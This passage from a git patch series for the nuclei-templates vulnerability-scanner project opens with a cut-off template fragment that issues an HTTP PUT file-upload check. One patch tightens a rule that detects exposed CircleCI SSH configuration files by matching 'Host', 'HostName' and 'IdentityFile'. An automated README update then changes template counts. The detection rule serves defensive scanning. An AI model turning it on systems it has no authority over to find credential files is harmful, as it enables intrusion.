/testing-put.txt HTTP/1.1 Content-Type: text/plain + req-condition: true matchers: - type: dsl name: multi-req From ff4df95a5ee4a9e185aa413363dd47244cad9786 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Mar 2021 14:29:16 +0000 Subject: [PATCH 369/370] Update circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml index 59e81e5ea9..2d6eb7e18a 100644 --- a/exposures/configs/circleci-ssh-config.yaml +++ b/exposures/configs/circleci-ssh-config.yaml @@ -19,6 +19,7 @@ requests: - "Host" - "HostName" - "IdentityFile" + condition: and - type: status status: From b32604fe6dbdc7bd170a626ac968d3df06dfe792 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 14:32:04 +0000 Subject: [PATCH 370/370] Auto Update README [Thu Mar 11 14:32:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b4ba60dc51..d73c7cc75c 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 62 | technologies | 50 | misconfiguration | 54 | +| exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 713 files**. +**75 directories, 714 files**.